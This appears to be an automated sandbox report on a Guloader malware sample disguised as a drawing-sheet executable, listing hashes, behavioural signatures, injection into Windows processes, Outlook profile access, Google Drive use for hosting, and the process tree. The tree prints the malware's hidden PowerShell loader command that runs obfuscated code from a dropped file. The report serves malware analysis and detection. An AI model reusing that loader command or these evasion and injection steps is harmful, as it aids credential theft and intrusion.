Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2024, 23:33
Static task
static1
Behavioral task
behavioral1
Sample
RefTechnical Drawing Sheet.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
RefTechnical Drawing Sheet.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
Fdrelandskrligehed/Tenuto/Sauria/Handelsbalancerne122.ps1
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
Fdrelandskrligehed/Tenuto/Sauria/Handelsbalancerne122.ps1
Resource
win10v2004-20240226-en
General
-
Target
RefTechnical Drawing Sheet.exe
-
Size
953KB
-
MD5
971bdb03f3caf8bb34464d3629c6fd5a
-
SHA1
2c28ace22924960730814e5a787ffcadde187278
-
SHA256
4abdae9b05fb343406136ff0cf863e8f403dc294578f111a746b125d59c5c91b
-
SHA512
6e160db5481a91b18bfee7ecdd7a1a18150072f5c518b351c6ffa36f2b176ee46318e61c42b58e00278dc926446e5b040aa85e42ab610faf9bd8822d7bc4bcd2
-
SSDEEP
24576:lbZCmf67FtuZFX3KJQgI/tpWrZAOWaTUF3w:N3f67FtuZB3oQNpWDWawF3w
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook ImagingDevices.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook ImagingDevices.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook ImagingDevices.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 63 drive.google.com 64 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 928 ImagingDevices.exe 928 ImagingDevices.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2156 powershell.exe 928 ImagingDevices.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2156 set thread context of 928 2156 powershell.exe 124 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
pid Process 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 928 ImagingDevices.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 1356 wrote to memory of 2156 1356 RefTechnical Drawing Sheet.exe 98 PID 1356 wrote to memory of 2156 1356 RefTechnical Drawing Sheet.exe 98 PID 1356 wrote to memory of 2156 1356 RefTechnical Drawing Sheet.exe 98 PID 2156 wrote to memory of 4340 2156 powershell.exe 103 PID 2156 wrote to memory of 4340 2156 powershell.exe 103 PID 2156 wrote to memory of 4340 2156 powershell.exe 103 PID 2156 wrote to memory of 1516 2156 powershell.exe 113 PID 2156 wrote to memory of 1516 2156 powershell.exe 113 PID 2156 wrote to memory of 1516 2156 powershell.exe 113 PID 2156 wrote to memory of 4648 2156 powershell.exe 114 PID 2156 wrote to memory of 4648 2156 powershell.exe 114 PID 2156 wrote to memory of 4648 2156 powershell.exe 114 PID 2156 wrote to memory of 3132 2156 powershell.exe 115 PID 2156 wrote to memory of 3132 2156 powershell.exe 115 PID 2156 wrote to memory of 3132 2156 powershell.exe 115 PID 2156 wrote to memory of 2016 2156 powershell.exe 116 PID 2156 wrote to memory of 2016 2156 powershell.exe 116 PID 2156 wrote to memory of 2016 2156 powershell.exe 116 PID 2156 wrote to memory of 3408 2156 powershell.exe 117 PID 2156 wrote to memory of 3408 2156 powershell.exe 117 PID 2156 wrote to memory of 3408 2156 powershell.exe 117 PID 2156 wrote to memory of 3800 2156 powershell.exe 118 PID 2156 wrote to memory of 3800 2156 powershell.exe 118 PID 2156 wrote to memory of 3800 2156 powershell.exe 118 PID 2156 wrote to memory of 3496 2156 powershell.exe 119 PID 2156 wrote to memory of 3496 2156 powershell.exe 119 PID 2156 wrote to memory of 3496 2156 powershell.exe 119 PID 2156 wrote to memory of 4908 2156 powershell.exe 120 PID 2156 wrote to memory of 4908 2156 powershell.exe 120 PID 2156 wrote to memory of 4908 2156 powershell.exe 120 PID 2156 wrote to memory of 3600 2156 powershell.exe 121 PID 2156 wrote to memory of 3600 2156 powershell.exe 121 PID 2156 wrote to memory of 3600 2156 powershell.exe 121 PID 2156 wrote to memory of 1124 2156 powershell.exe 122 PID 2156 wrote to memory of 1124 2156 powershell.exe 122 PID 2156 wrote to memory of 1124 2156 powershell.exe 122 PID 2156 wrote to memory of 1224 2156 powershell.exe 123 PID 2156 wrote to memory of 1224 2156 powershell.exe 123 PID 2156 wrote to memory of 1224 2156 powershell.exe 123 PID 2156 wrote to memory of 928 2156 powershell.exe 124 PID 2156 wrote to memory of 928 2156 powershell.exe 124 PID 2156 wrote to memory of 928 2156 powershell.exe 124 PID 2156 wrote to memory of 928 2156 powershell.exe 124 PID 2156 wrote to memory of 928 2156 powershell.exe 124 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook ImagingDevices.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook ImagingDevices.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\RefTechnical Drawing Sheet.exe"C:\Users\Admin\AppData\Local\Temp\RefTechnical Drawing Sheet.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Designeringen=Get-Content 'C:\Users\Admin\AppData\Local\butikstiders\Sjunger\Fdrelandskrligehed\Tenuto\Sauria\Handelsbalancerne122.San';$Indiciets=$Designeringen.SubString(58339,3);.$Indiciets($Designeringen)"2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"3⤵PID:4340
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:1516
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:4648
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:3132
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:2016
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:3408
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:3800
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:3496
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:4908
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:3600
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:1124
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵PID:1224
-
-
C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:928
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3816 --field-trial-handle=2280,i,716736634476467098,11449718822158202904,262144 --variations-seed-version /prefetch:81⤵PID:4860
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\butikstiders\Sjunger\Fdrelandskrligehed\Tenuto\Sauria\Handelsbalancerne122.San
Filesize57KB
MD50c865acf7c347c6dd359f98c8251a9bc
SHA1dc6ad24450f7a966e5c090abce2ec06f23cef9ae
SHA25600f3155ff5edff6c7b7286095854eae05446345e358018fee4c5fb141a458d7e
SHA512a7ead01800f440b0d4e8f07040818ed72ff1c768cb44ffc1823230b5bee96238b25373a652be4509c88cb371772da1061f5b14b3fa5a7e1e7833dc07d56f1aaa
-
Filesize
331KB
MD52bacc6e73f38a23b51232641499c7f06
SHA1a025b456d210fc55f396701e268fba2f3949905d
SHA2566225888e9e81bb79d091fcb742c75f5e5b38b0bf46836a1dcaeb7eaa680f6cc8
SHA512bf1996b6da8b026315a95fd71d61d4b730a37af1e461d2f8f42a57027aff5e914bfc121d41d00f38ae59e2f02c3bf43ce507f692742b3d84d9c1cce272ca6f79